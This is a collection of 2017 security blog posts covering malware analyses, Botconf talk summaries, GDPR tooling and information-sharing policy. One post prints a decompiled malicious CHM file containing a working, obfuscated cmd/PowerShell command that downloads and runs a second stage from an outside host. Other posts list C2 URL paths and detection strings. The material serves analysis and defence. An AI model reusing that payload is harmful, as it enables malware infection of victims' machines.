Saturday, December 30, 2017

[SANS ISC] 2017, The Flood of CVEs

I published the following diary on isc.sans.org: “2017, The Flood of CVEs“:

2017 is almost done and it’s my last diary for this year. I made a quick review of my CVE database (I’m using a local cve-search instance). The first interesting number is the amount of CVE’s created this year. Do you remember when the format was CVE-YYYY-XXXX? The CVE ID format changed in 2014 to break the limit of 9999 entries per year. This was indeed a requirement when you see the number of entries for the last five years… [Read more]

[The post [SANS ISC] 2017, The Flood of CVEs has been first published on /dev/random]



from Xavier

Friday, December 22, 2017

Who’s That Bot?

If you own a website, you already know that servers are visited all day long by bots and crawlers with multiple intents, sometimes good but also sometimes bad. An interesting field in web server logs is the “user-agent”. The RFC 2616 describes the User-Agent field used in HTTP requests:

The User-Agent request-header field contains information about the user agent originating the request. This is for statistical purposes, the tracing of protocol violations, and automated recognition of user agents for the sake of tailoring responses to avoid particular user agent limitations. User agents SHOULD include this field with requests. The field can contain multiple product tokens (section 3.8) and comments identifying the agent and any subproducts which form a significant part of the user agent. By convention, the product tokens are listed in order of their significance for identifying the application.

It’s always interesting to keep an eye on the User-Agents found in your logs even if often they are spoofed. It can indeed contain almost anything. Note that many websites trust the User-Agent to display some content in different ways depending on the browser, the operating system. During an old pentest engagement, I also saw an authentication bypass via a specific User-Agent… which is bad! That’s why there exists a tool to stress test a website with multiple variations of User-Agent strings: ua-tester.

Most tools and browsers allow selecting the User-Agent via a configuration file or a plugin (for Browsers). The choice of a User-Agent string may vary depending on how your goal. During a penetration test, you’ll try to work below the radar by using a very common User-Agent (a well-known browser on a modern OS):

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
  Chrome/63.0.3239.84 Safari/537.36

Sometimes, you will change the User-Agent to detect behaviour changes (ex: to access the mobile version of a website).

Mozilla/5.0 (Linux; Android 4.4.4; SAMSUNG SM-G318H Build/KTU84P) AppleWebKit/537.36 \
  (KHTML, like Gecko) SamsungBrowser/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36

Finally, sometimes it’s better to show clean hands!

For my researches and while hunting, I’m fetching a *lot* of data from websites. Sometimes, I’m accessing the same pages again and again. This behaviour can be seen as intrusive by the website owner. In this case, it’s always better to be polite and to present yourself. In my scripts, I’m always using the following User-Agent:

XmeBot/1.0 (https://blog.rootshell.be/bot/)

The URL is hidden on my blog and is available to provide more information about me and my intents (basically, why I’m fetching data). By keeping an eye on the page access statistics, it also helps me to learn who’s keeping an eye on their website logs 😉

[The post Who’s That Bot? has been first published on /dev/random]



from Xavier

Wednesday, December 20, 2017

Installing Python Modules on Air-Gapped Hosts

Who said that all computers are connected today? They are many classified environments where computers can simply never connect to the wild Internet. But sometimes, you need to install some pieces of software from online resources. The classic case is Python modules. Let’s take a practical example with the PyMISP which allows interacting with a MISP instance. Just forget to make a ‘pip install pymisp’ on an air-gapped computer!

The next challenge is to resolve all the dependencies. On an air-gapped host, to make PyMISP work properly, I had to follow this dependency tree (this might change depending on your Python environment):

pymisp -> dateutil -> six
       -> requests -> idna
                   -> urllib3
                   -> chardet
                   -> certify

If you need to download and transfer these packages manually from source and build them, you will probably face another issue: the air-gapped environment does not have all tools to build the package (sounds logical). There is a solution to solve this: “Wheel”. It’s a built, archive format that can greatly speed installation compared to building and installing from source archives. A wheel archive (.whl) can be installed with the pip tool:

C:\Temp> pip install .\requests‑2.18.4‑py2.py3‑none‑any.whl

I found a wonderful source of ready-to-use Wheel archives prepared by Christoph Gohlke from the University of California, Irvine. He maintains a huge library of common Python packages (2 & 3):

If you’re working in a restricted environment, you probably don’t have admin rights. Add the ‘–user’ argument to the pip commands to install the Python module in your $USER environment.

Keep in mind:

  • Some packages might contain executable code. Don’t break your local policy!
  • Always download material from trusted sources
  • Validate hashes
  • Build your own Wheel archives if in doubt and create your own repository

[The post Installing Python Modules on Air-Gapped Hosts has been first published on /dev/random]



from Xavier

Tuesday, December 19, 2017

Malware Delivered via a Compiled HTML Help File

More a file format is used in a malware infection chain, more files of this type will be flagged as suspicious, analyzed or blocked by security controls. That’s why attackers are constantly looking for new ways to infect computers and use more exotic file formats. Like fashion is in a state of perpetual renewal, some files are regularly coming back on the malware scene. Today, I found a malicious .chm file. A .chm file is a compiled HTML help file that may include text, images, and hyperlinks. It can be viewed in a Web browser; in programs as an online help solution or by Windows via a specific tool: hh.exe.

As most Microsoft file formats, it may also link to external resources that can be launched from the HTML file. By external resources, I mean here malicious scripts or executables. The file reached my spam trap and was delivered in a ZIP archive: NF_e_DANFE41160909448706.zip (SHA256: f66964e733651d78593d593e2bd83913b6499fa80532abce64e07a91293eb12d). The .chm file was called NF-e_DANFE41160909448706kPEvjg.chm (SHA256: 867d0bb716acdb40ae403fc734351c5f195cb98b6f032ec77ef72160e6435d1f). When the file is opened, the default tool, hh.exe, is used and displays a blank page. A command line prompt is launched with a Powershell script:

Malware Behaviour

It is easy to understand what is happening but is there a way to better analyze the content of the compiled HTML help file? hh.exe has a flag ‘-decompile’ which, as the name says, decompile the .chm file into a folder:

C:\Users\xavier\Desktop> hh.exe -decompile malicious NF-e_DANFE41160909448706kPEvjg.chm

In the malicious directory, we find now the name of the original file. Here is the content:

<OBJECT id="XJUY7K" type="application/x-oleobject" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" codebase="hhctrl.ocx#Version=5,02,3790,1194" width="1" height="1">
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd.exe, /C &quot;cd %SystemRoot%\System32&&cm^d^.exe /V ^/^C^ se^t^ r^i^=ers^&^&set ^ji=^^h^^e^^l^^l^&^&^s^e^t^ ju^=^^p^^o^^w^&^&^set ^rp^=^^W^^in^^d^^ows!^ju!^!^ri^!^!ji!\^^v^^1^^.^^0^^\^!j^u^!^!^ri!^!^ji!^&^&^echo^ ^^IE^^x^^(^^^&quot;`I^^E^^`X(n^^`eW-^^O^^BJ^^E`C^^t^^ n^^ET^^.^^wE^^b^^`c^^`l^^i`e^^N^^t^^`)^^.^^d^^Ow^^Nlo^^a^^Ds^^tr^^i^^n^^g('ht^^tp^^s^^://jaz^^y^^.oth^^iak.c^^o^^m^^/?^^d^^mF^^us^^AKL^^Yq^^Q^^C8^^5^^t^^B^^e^^8^^pKTM^^CS^^g^^p^^ReW^^TJa+r^^ClY^^m^^w^^f^^Mn^^f^^s^^CI^^L^^X^^a^^3Fj^^3^^g^^g^^V^^R^^j^^s^^iR^^OS^^s^^OS^^O^^qj^^r^^jb^^OWu^^rLN^^T^^v^^I^^G^^AaAoVw3kD8^^2/^^W^^rI^^PAb3^^QU^^9BsS^^5^^2V^^p^^6')^^^&quot;^^); ^|^ !^rp^!^ -nop^^ ^^-win 1 -&quot;">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
XJUY7K.Click();
</SCRIPT>
</HEAD>
<body>
</BODY>
</HTML>

The second stage is downloaded from hXXps://jazy.othiak[.]com/?dmFusAKLYqQC85tBe8pKTMCSgpReWTJa+rClYmwfMnfsCILXa3Fj3ggVRjsiROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3QU9BsS52Vp6

Nothing fancy, not really new but still effective…

 

[The post Malware Delivered via a Compiled HTML Help File has been first published on /dev/random]



from Xavier

How Microsoft tools and partners support GDPR compliance

This post is authored by Daniel Grabski,Executive Security Advisor, Microsoft Enterprise Cybersecurity Group.

As an Executive Security Advisor for enterprises in Europe and the Middle East, I regularly engage with Chief Information Security Officers (CISOs), Chief Information Officers (CIOs) and Data Protection Officers (DPOs) to discuss their thoughts and concerns regarding the General Data Protection Regulation, or GDPR. In my last post about GDPR, I focused on how GDPR is driving the agenda of CISOs. This post will present resources to address these concerns.

Some common questions are How can Microsoft help our customers to be compliant with GDPR? and, Does Microsoft have tools and services to support the GDPR journey? Another is, How can I engage current investments in Microsoft technology to address GDPR requirements?

To help answer these, I will address the following:

  • GDPR benchmark assessment tool
  • Microsoft partners & GDPR
  • Microsoft Compliance Manager
  • New features in Azure Information Protection

Tools for CISOs

There are tools available that can ease kick-off activities for CISOs, CIOs, and DPOs. These tools can help them better understand their GDPR compliance, including which areas are most important to be improved.

  • To begin, Microsoft offers a free GDPR benchmark assessment tool which is available online to any business or organization.The assessment questions are designed to assist our customers to identify technologies and steps that can be implemented to simplify GDPR compliance efforts. It is also a tool allowing increased visibility and understanding of features available in Microsoft technologies that may already be available in existing infrastructures. The tool can reveal what already exists and what is not addressed to support each GDPR journey. As an outcome of the assessment, a full report is sentan example of which is shown here.

Image 1: GDPR benchmarking tool

As an example, see below the mapping to the first question in the Assessment. This is based on how Microsoft technology can support requirements about collection, storage, and usage of personal data; it is necessary to first identify the personal data currently held.

  • Azure Data Catalog provides a service in which many common data sources can be registered, tagged, and searched for personal data. Azure Search allows our customers to locate data across user-defined indexes. It is also possible to search for user accounts in Azure Active Directory. For example, CISOs can use the Azure Data Catalog portal to remove preview data from registered data assets and delete data assets from the catalog:

Image 2: Azure Data Catalogue

  • Dynamics 365 provides multiple methods to search for personal data within records such as Advanced Find, Quick Find, Relevance Search, and Filters. These functions each enable the identification of personal data.
  • Office 365 includes powerful tools to identify personal data across Exchange Online, SharePoint Online, OneDrive for Business, and Skype for Business environments. Content Search allows queries for personal data using relevant keywords, file properties, or built-in templates. Advanced eDiscovery identifies relevant data faster, and with better precision, than traditional keyword searches by finding near-duplicate files, reconstructing email threads, and identifying key themes and data relationships. Image 3 illustrates the common workflow for managing and using eDiscovery cases in the Security & Compliance Center and Advanced eDiscovery.

Image 3: Security & Compliance Center and Advanced eDiscovery

  • Windows 10 and Windows Server 2016 have tools to locate personal data, including PowerShell, which can find data housed in local and connected storage, as well as search for files and items by file name, properties, and full-text contents for some common file and data types.

A sample outcome, based on one of the questions regarding GDPR requirements, as shown in Image 4.

Image 4: example of the GDPR requirements mapped with features in the Microsoft platform

Resources for CISOs

Microsofts approach to GDPR relies heavily on working together with partners. Therefore, we built a broader version of the GDPR benchmarking tool available to customers through the extensive Microsoft Partner Network. The tool provides an in-depth analysis of an organizations readiness and offers actionable guidance on how to prepare for compliance, including how Microsoft products and features can help simplify the journey.

The Microsoft GDPR Detailed Assessmentis intended to be used by Microsoft partners who are assisting customers to assess where they are on their journey to GDPR readiness. The GDPR Detailed Assessment is accompanied by supporting materials to assist our partners in facilitating customer assessments.

In a nutshell, the GDPR Detailed Assessment is a three-step process where Microsoft partners engage with customers to assess their overall GDPR maturity. Image 5 below presents a high-level overview of the steps.

Image 5

The duration for the partner engagement is expected to last 3-4 weeks, while the total effort is estimated to be 10 to 20 hours, depending on the complexity of the organization and the number of participants as you can see below.

Image 6: Duration of the engagement

The Microsoft GDPR Detailed Assessment is intended for use by Microsoft partners to assess their customers overall GDPR maturity. It is not offered as a GDPR compliance attestation. Customers are responsible to ensure their own GDPR compliance and are advised to consult their legal and compliance teams for guidance. This tool is intended to highlight resources that can be used by partners to support a customers journey towards GDPR compliance.

We are all aware that achieving organizational compliance may be challenging. It is hard to stay up-to-date with all the regulations that matter to organizations and to define and implement controls with limited in-house capability.

To address these challenges, Microsoft announced a new compliance solution to help organizations meet data protection and regulatory standards more easily when using Microsoft cloud services Compliance Manager. The preview program, available today, addresses compliance management challenges and:

  • Enables real-time risk assessment on Microsoft cloud services
  • Provides actionable insights to improve data protection capabilities
  • Simplifies compliance processes through built-in control management and audit-ready reporting tools

Image 7 shows a dashboard summary illustrating a compliance posture against the data protection regulatory requirements that matter when using Microsoft cloud services. The dashboard summarizes Microsofts and your performance on control implementation on various data protection standards and regulations, including GDPR, ISO 27001, and ISO 27018.

Image 7: Compliance Manager dashboard

Having a holistic view is just the beginning. Use the rich insights available in Compliance Manager to go deeper to understand what should be done and improved. Each Microsoft-managed control illuminates the implementation and testing details, test date, and results. The tool provides recommended actions with step-by-step guidance. It aides better understanding of how to use the Microsoft cloud features to efficiently implement the controls managed by your organization. Image 8 shows an example of the insight provided by the tool.

Image 8: Information to help you improve your data protection capabilities

During the recentMicrosoft Ignite conference, Microsoft announced Azure Information Protection scanner. The feature is now available in public preview. This will help to manage and protect significant on-premise data and help prepare our customers and partners for regulations such as GDPR.

We released Azure Information Protection (AIP) to provide the ability to define a data classification taxonomy and apply those business rules to emails and documents. This feature is critical to protecting the data correctly throughout the lifecycle, regardless of where it is stored or shared.

We receive a lot of questions about how Microsoft can help to discover, label, and protect existing files to ensure all sensitive information is appropriately managed. The AIP scanner can:

  • Discover sensitive data that is stored in existing repositories when planning data-migration projects to cloud storage, to ensure toxic data remains in place.
  • Locate data that includes personal data and learn where it is stored to meet regulatory and compliance needs
  • Leverage existing metadata that was applied to files using other solutions

I encourage you to enroll for the preview version of Azure Information Protection scanner and to continue to grow your knowledge about how Microsoft is addressing GDPR and general security with these helpful resources:


About the author:

Daniel Grabski is a 20-year veteran of the IT industry, currently serving as an Executive Security Advisor for organizations in Europe, the Middle East, and Africa with Microsoft Enterprise Cybersecurity Group. In this role he focuses on enterprises, partners, public sector customers and critical infrastructure stakeholders delivering strategic security expertise, advising on cybersecurity solutions and services needed to build and maintain secure and resilient ICT infrastructure.



from Microsoft Secure Blog Staff

[SANS ISC] Example of ‘MouseOver’ Link in a Powerpoint File

I published the following diary on isc.sans.org: “Example of ‘MouseOver’ Link in a Powerpoint File“:

I really like Microsoft Office documents… They offer so many features that can be (ab)used to make them virtual bombs. Yesterday, I found a simple one but nicely prepared Powerpoint presentation: Payment_copy.ppsx (SHA256:7d6f3eb45c03a8c2fca4685e9f2d4e05c5fc564c3c81926a5305b6fa6808ac3f). It was still unknown on VT yesterday but it reached now a score of 1/61!. It was delivered to one of my catch-all mailboxes and contained just one slide…. [Read more]

 

[The post [SANS ISC] Example of ‘MouseOver’ Link in a Powerpoint File has been first published on /dev/random]



from Xavier

"Public Wi-Fi Attacks - Starbucks"

One of the dangers when working while on the road is using public Wi-Fi access points, such as the ones you find in your hotel, airport or local cafe. Public Wi-Fi is incredibly convenient, but does come with its own unique risks. The two biggestthreats isbad buys either setting up rogue Wi-Fi access points, or &hellip; Continue reading Public Wi-Fi Attacks - Starbucks

from lspitzner

Monday, December 18, 2017

"HR - *Please* Stop Requiring Tech Backgrounds for Security Awareness Officers"

As we get ready to enter into 2018 one of the things I'm so excitedto see is more and more organizations investing in managing their human risk, to include hiring what many call Security Awareness Officer, Security Communications Officer ora position related to Security Training or Culture. To be honest, I'm far less concerned about &hellip; Continue reading HR - *Please* Stop Requiring Tech Backgrounds for Security Awareness Officers

from lspitzner

Saturday, December 16, 2017

[SANS ISC] Microsoft Office VBA Macro Obfuscation via Metadata

I published the following diary on isc.sans.org: “Microsoft Office VBA Macro Obfuscation via Metadata“:

Often, malicious macros make use of the same functions to infect the victim’s computer. If a macro contains these strings, it can be flagged as malicious or, at least, considered as suspicious. Some examples of suspicious functions are:

  • Microsoft.XMLHTTP (used to fetch web data)
  • WScript.Shell (used to execute other scripts or commands)

… [Read more]

 

[The post [SANS ISC] Microsoft Office VBA Macro Obfuscation via Metadata has been first published on /dev/random]



from Xavier

Thursday, December 14, 2017

"2017 EU Security Awareness Summit - After Action Report"

&nbsp; The SANS EU Security Awareness Summit is an annual event that brings together security awareness professionals and industry experts from around the world to share and learn from each other how to manage human risk. This year was the largest event ever in Europe, bringing together over 130 awareness professionals for a jammed pack &hellip; Continue reading 2017 EU Security Awareness Summit - After Action Report

from lspitzner

Wednesday, December 13, 2017

How public-private partnerships can combat cyber adversaries

For several years now, policymakers and practitioners from governments, CERTs, and the security industry have been speaking about the importance of public-private partnerships as an essential part of combating cyber threats. It is impossible to attend a security conference without a keynote presenter talking about it. In fact, these conferences increasingly include sessions or entire tracks dedicated to the topic. During the three conferences Ive attended since Junetwo US Department of Defense symposia, and NATOs annual Information Symposium in Belgium, the message has been consistent: public-private information-sharing is crucial to combat cyber adversaries and protect users and systems.

Unfortunately, we stink at it. Information-sharing is the Charlie Brown football of cyber: we keep running toward it only to fall flat on our backs as attackers continually pursue us. Just wait til next year. Its become easier to talk about the need to improve information-sharing than to actually make it work, and its now the technology industrys convenient crutch. Why? Because no one owns it, so no one is accountable. I suspect we each have our own definition of what information-sharing means, and of what success looks like. Without a sharp vision, can we really expect it to happen?

So, what can be done?

First, some good news: the security industry wants to do this–to partner with governments and CERTs. So, when we talk about it at conferences, or when a humble security advisor in Redmond blogs about it, its because we are committed to finding a solution. Microsoft recently hosted BlueHat, where hundreds of malware hunters, threat analysts, reverse engineers, and product developers from the industry put aside competitive priorities to exchange ideas and build partnerships. In my ten years with Microsoft, Ive directly participated in and led information-sharing initiatives that we established for the very purpose of advancing information assurance and protecting cyberspace. In fact, in 2013, Microsoft created a single legal and programmatic framework to address this issue, the Government Security Program.

For the partnership to work, it is important to understand and anticipate the requirements and needs of government agencies. For example, we need to consider cyber threat information, YARA rules, attacker campaign details, IP address, host, network traffic, and the like.

What can governments and CERTs do to better partner with industry?

  • Be flexible, especially on the terms. Communicate. Prioritize. In my experience, the mean-time-to-signature for a government to negotiate an info-sharing agreement with Microsoft is between six months and THREE YEARS.
  • Prioritize information sharing. If this is already a priority, close the gap. I fear governments attorneys are not sufficiently aware of how important the agreements are to their constituents. The information-sharing agreements may well be non-traditional agreements, but if information-sharing is truly a priority, lets standardize and expedite the agreements. Start by reading the 6 Nov Department of Homeland Security OIG report, DHS Can Improve Cyber Threat Information-Sharing document.
  • Develop and share with industry partners a plan to show how government agencies will consume and use our data. Let industry help government and CERTs improve our collective ROI. Before asking for data, lets ensure it will be impactful.
  • Develop KPIs to measure whether an information-sharing initiative is making a difference, quantitative or qualitative. In industry, we could do a better job at this, as we generally assume that were providing information for the right reason. However, I frequently question whether our efforts make a real difference. Whether we look for mean-time-to-detection improvements or other metrics, this is an area for improvement.
  • Commit to feedback. Public-private information-sharing implies two-way communication. Understand that more companies are making feedback a criterion to justify continuing investment in these not-for-profit engagements. Feedback helps us justify up the chain the efficacy of efforts that we know are important. It also improves two-way trust and contributes to a virtuous cycle of more and closer information-sharing. At Microsoft, we require structured feedback as the price of entry for a few of our programs.
  • Balance interests in understanding todays and tomorrows threats with an equal commitment to lock down what is currently owned.(My favorite) Information-sharing usually includes going after threat actors and understanding whats coming next. Thats important, but in an assume compromise environment, we need to continue to hammer on the basics:
    • Patch.If an integrator or on-site provider indicates patching and upgrading will break an application, and if that is used as an excuse not to patch, that is a problem. Authoritative third-parties such as US-CERT, SANS, and others recommend a 48- to 72-hour patch cycle. Review www.microsoft.com/secure to learn more.
      • Review www.microsoft.com/sdl to learn more about tackling this issue even earlier in the IT development cycle, and how to have important conversations with contractors, subcontractors,and ISVs in the software and services supply chain.
    • Reduce administrative privilege. This is especially important for contractor or vendor accounts. Up to 90 percent of breaches come from credential compromise. This is largely caused by a lack of, or obsolete, administrative, physical and technical controls to sensitive assets. Basic information-sharing demands that we focus on this. Here is guidance regarding securing access.

Ultimately, we in the industry can better serve governments and CERTs by incentivizing migrations to newer platforms which offer more built-in security; and that are more securely developed. As we think about improving information-sharing, lets be clear that this includes not only sharing technical details about threats and actors but also guidance on making governments fundamentally more secure on newer and more secure technologies.

 



from Jenny Erie

[SANS ISC] Tracking Newly Registered Domains

I published the following diary on isc.sans.org: “Tracking Newly Registered Domains“:

Here is the next step in my series of diaries related to domain names. After tracking suspicious domains with a dashboard and proactively searching for malicious domains, let’s focus on newly registered domains. They are a huge number of domain registrations performed every day (on average a few thousand per day all TLD’s combined). Why focus on new domains? With the multiple DGA (“Domain Generation Algorithms”) used by malware families, it is useful to track newly created domains and correlate them with your local resolvers’ logs. You could detect some emerging threats or suspicious activities… [Read more]

[The post [SANS ISC] Tracking Newly Registered Domains has been first published on /dev/random]



from Xavier

Friday, December 8, 2017

Botconf 2017 Wrap-Up Day #3

And this is already the end of Botconf. Time for my last wrap-up. The day started a little bit later to allow some people to recover from the social event. It started at 09:40 with a talk presented by Anthony Kasza, from PaloAlto Networks: “Formatting for Justice: Crime Doesn’t Pay, Neither Does Rich Text“. Everybody knows the RTF format… even more since the famous CVE-2017-0199. But what’s inside an RTF document? As the name says, it is used to format text. It was created by Microsoft in 1987. It has similarities with HTML:

RTF vs HTML

Entities are represented with ‘{‘ and ‘}’. Example:

{\iThis is some italic text}

There are control words like “\rtf”, “\info”, “\author”, “\company”, “\i”, “\AK”, …. It is easy to obfuscate such document with extra whitespaces, headers or with nested elements:

{\rtf [\info]] == {\rtf }}

This means that writing signature is complex. Also, just rename the document with a .doc extension and it will be opened by Word. How to generate RTF documents? They are the official “tools” like Microsoft or Wordpad but they are, of course, plenty of malicious tools:

  • 2017-0199 builder
  • wingd/stone/ooo
  • Sofacy, Monsoon, MWI
  • Ancalog, AK builder

What about analysis tools? Here also, it is easy to build a toolbox with nice tools: rtfdump, rtfobj, pyRTF, YARA are some of them. To write good signatures, Anthony suggested focussing on suspicious words:

  •  \info
  • \object
  • DDEAUTO
  • \pict
  • \insrsid or \rsidtbl

DDEAUTO is a good candidate for a while and is seen as the “most annoying bug of the year” for its inclusion in everything (RTF & other documents, e-mail, calendar entries…). Anthony finished his talk by providing a challenge based on an RTF file.

The next talk was presented byPaul Jung: “PWS, Common, Ugly but Effective“. PWS also know as “info stealer” are a very common piece of malware. They steal credentials from many sources (browsers, files, registries, wallets, etc).
PWS

They also offer “bonus” features like screenshot grabbers or keylogger. How to find them? Buy them, find a cracked one or open sources. Some of them have also promotional videos on Youtube! A PWS is based on a builder that generates a specific binary based on the config file, it is delivered via protocols like email, HTTP and data are managed via a control panel. Paul reviewed some well-known PWS like JPro Crack Stealer, Pony (the most famous), Predator Pain or Agent Tesla. The last one promotes itself as “not being a malware”. Some of them support more than 130 different applications to steal passwords from. Some do not reinvent the wheel and just use external tools (ex: the Nirsoft suite). If it is difficult to detect them before the infection, it’s quite easy to spot them based on the noise they generate in log files. They use specific queries:

  • “POST /fre.php” for Lokibot
  • “POST /gate.php” for Pony or Zeus

Very nice presentation!

After the first coffee refill break, Paul Rascagnères presented “Nyetya Malware & MeDoc Connection“. The presentation was a recap of the bad story that affected Ukraine a few months ago. It started with a phone call saying “We need help“. They received some info to start the investigation but their telemetry did not return anything juicy (Talos collects a huge amount of data to build their telemetry). Paul explained the case of M.E. Doc, a company providing a Windows application for tax processing. The company servers were compromised and the software was modified. Then, Paul reviewed the Nytia malware. It used WMI, PsExec, EternalBlue, EternalRomance and scanned ranges of IP to infect more computers. It also used a modified version of Mimikatz. Note that Nyetya cleared the infected host logs. This is a good reminder to always push logs on an external system to prevent losing pieces of evidence.

The next talk was about a system to track the Locky ransomware based on its DGA: “Math + GPU + DNS = Cracking Locky Seeds in Real Time without Analyzing Samples“. Yohai Einav Alexey Sarychev explained how they solved the problem to detect as fast as possible new variation of domain names used by the Locky ransomware. The challenges were:

  • To get the DGA  (it’s public now)
  • To be able to process a vast search space. The namespace could be enormous (from 3 digit seed to 4 then 5, 6). There is a scalability problem.
  • Mapping the ambiguity (and avoid collisions with other DGA’s)

So solution they developed is based on GPU (for maximum speed). If you’re interested in the Locky DGA, you can have a look at their dataset.

The next talk was, for me, the best of the day because it contained a lot of useful information that many people can immediately reuse in their environment to improve the detection of malicious behaviour or to improve their DFIR process. It was titled “Hunting Attacker Activities – Methods for Discovering, Detecting Lateral Movements” and presented by Keisuke Muda and Shusei Tomonaga. Based on their investigations, they explained how attackers can perform lateral movement inside a network just be using standard Windows tools (that, by default, are not flagged as malicious by the antivirus).

https://github.com/baderj/domain_generation_algorithms/tree/master/locky

They presented multiple examples of commands or small scripts used to scan, pivot, cover tracks, etc. Then they explained how to detect this kind of activity. They made a good comparison of the standard Windows audit log versus the well-known Sysmon tool. They presented pro & con of each solution and the conclusion could be that, for maximum detection, you need both. There were so many examples that it’s not possible to list them here. I just recommend you to have a look at the documents available online:

It was an amazing presentation!

After the lunch, Jaeson Schultz, also from Talos, presented “Malware, Penny Stocks, Pharma Spam – Necurs Delivers“. The talk was a good review of the biggest spam botnet active. Just some numbers collected from multiple campaigns; 2.1 messages, 1M unique sender IP addresses from 216 countries/territories. The top countries are India, Vietnam, Iran and Pakistan. Jaeson explained that the re-use of IP address is so low that it’s difficult to maintain blacklists.

IP Addresses Reuse

How do the bad guys send emails? They use harvested accounts (of course) but also auto-generated addresses and common / role-based accounts. That’s why the use of catch-all mailboxes is useful. Usually, big campaigns are launched from Monday to Friday and regular campaigns are constantly running at a low speed. Jaeson presented many examples of spam, attachments. Good review with entertaining slides.

Then, Łukasz Siewierski presented “Thinking Outside of the (Sand)box“. Łukasz is working for Google (Play Store) and analyze applications. He said that all applications submitted to Google are reviewed from a security point of view. Android has many security features: SE linux, application sandbox, permission model, verified boot, (K)ASLR, Seccomp but the presentation focused on the sandbox. First, why is there a sandboxing system? To prevent spyware to access other applications data, to prevent applications to pose as other ones, make easy to attribute action to specific apps and to allow strict policy enforcement.  But how to break the sandbox? First, the malware can ask users for a number of really excessive permissions. In this case, you just have to wait and cross your fingers that he will click “Allow”. Another method is to use Xposed. I already heard about this framework at Hack in the Box. It can prevent apps to be displayed in the list of installed applications. It gives any application every permission but there is one big drawback: the victim MUST install Xposed! The other method is to root the phone, inject code into other processes and profit. Łukasz explained different techniques to perform injection on Android but it’s not easy. Even more since the release of “Nougat” which introduced now mitigations techniques.

The last slot was assigned to Robert Simmons who presented “Advanced Threat Hunting“. It was very interesting because Robert gave nice tips to improve the process of threat hunting. It can require a lot of resources that are … limited! We have small teams with limited resources and limited time. He also gave tips to better share information. A good example is YARA rules. Everybody has a set of YARA rules in private directories, on laptops, etc. Why not store them in a central repository like a gitlab server? Many other tips were given that are worth a read if you are performing threat hunting.

The event was close to the classic kind word of the team. You can already book your agenda for the 6th edition that will be held in Toulouse!

 

The Botconf Crew

[The post Botconf 2017 Wrap-Up Day #3 has been first published on /dev/random]



from Xavier

Botconf 2017 Wrap-Up Day #2

I’m just back from the social event that was organized at the aquarium Mare Nostrum. A very nice place full of threats as you can see in the picture above. Here is my wrap-up for the second day.

The first batch of talks started with “KNIGHTCRAWLER,  Discovering Watering-holes for Fun, Nothing” presented by Félix Aimé. This is Félix’s personal project that he started in 2016 to get his own threat intelligence platform. He started with some facts like the definition of a watering hole: it is the insertion of specific malicious scripts on a specific website to infect visitors. Usually, Javascript + iframe that redirect to the malicious server but it can also be a malvertising campaign (via banners). They are not easy to track because, on the malicious server, you can have protections like IP whitelists (in case of targeted attack or to keep researchers away), browser fingerprinting, etc. Then he explained how he build his own platform and the technique used to find suspicious activities: passive DNS, common crawl indexes, directory scraping, leaked DNS, … It is interesting to note that he uses YARA rules. In fact, he created his personal (legal) botnet. The architecture is based on a master server (the C&C) which is talking to crawler servers. Actually, he’s monitoring 25K targets. This is an ongoing project and Félix will still improve it. Not that it is not publicly available. He also gave some nice examples of findings like the keylogger on WordPress that we reported yesterday. He detected it for the first time a few months ago he told me! Very nice project!

The second talk was a complete review of the Wannacry attack that hits many organizations in May 2017: “The (makes me) Wannacry Investigation” presented by Alan Neville from Symantec. This is the last time that the SANS ISC InfoCON was raised to yellow! Everybody remembers this bad story. Alan reviewed some major virus infections during the last years like Blaster (2003) or Conficker (2008). These malware infected millions of computers but, in the case of Wannacry, “only” 300K hosts were infected. But, the impact was much more important: factories, ATM’s, billboards, health devices, etc. Then Alan reviewed some technical aspect of Wannacry and mentioned, of course, the famous kill-switch domain: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com. In fact, Symantec detected an early version of the ransomware a few months before (without the Eternal Blue exploit). They also observed some attacks in March/April 2017. But, basics security rules could have reduced the impact of the ransomware: have a proper patching procedure as well as backup/restore procedures.

After the morning coffee refill, Maria Jose Erquiaga came on stage to present: “Malware Uncertainty Principle: an Alteration of Malware Behavior by Close Observation“. This talk was a presentation of the study of the influence of web TLS interception in malware analysis. Indeed, today, more and more malwares are communicating on top of HTTPS. What will happen if we play MitM with them to intercept communications with the C&C server? Maria explained the lab that was deployed with two scenarios: with and without an intercepting proxy.

Nomad Project Infrastructure

Once the project in place, they analyzed many samples and captured all the traffic. The result of this research is available online (link). What did they find? Sometimes, there is no communication at all with the C&C because the malware is using a custom protocol via TCP/443. This one is rejected by the proxy. Some malwares tried to reconnect continuously or seek another way to connect (ex: via different ports).

The next one was “Knock Knock… Who’s there? admin admin, Get In! An Overview of the CMS Brute-Forcing Malware Landscape” presented by Anna Shirokova from Cisco. This talk was presented at BruCON but, being part of the organization, I was not able to follow it. Hopefully, this time was the right one. I’m maintaining multiple WordPress sites and, I fully agree, brute-force attacks are constantly launched and pollute my logs. Anna started with a review of the brute-force attacks and the targets. Did you know that ~5% of the Internet websites are running WordPress? This is a de-facto target. There are two types of brute-force attacks: the vertical one (a list of passwords is tested against one target) and horizontal (one password is tested against a list of targets). Brute-force attacks are not new, Anna made a quick recap from 2009 until 2015 with nice names like FortDisco, Mayhem, CMS Catcher, Troldesh, etc. And it’s still increasing… Then Anna focuses on Sathurbot which is a modular botnet with different features: downloader, web crawler and brute-forcer). The crawler module uses search engines to find a list of sites to be targeted (ex: “bing.com/search?q=makers%20manage%20manual“). Then the brute-force attack starts against /wp-login.php. Nice research which revealed that the same technique is always used and that many WordPress instances are still using weak passwords! Note that it is difficult to measure the success rate of those brute-force attacks).

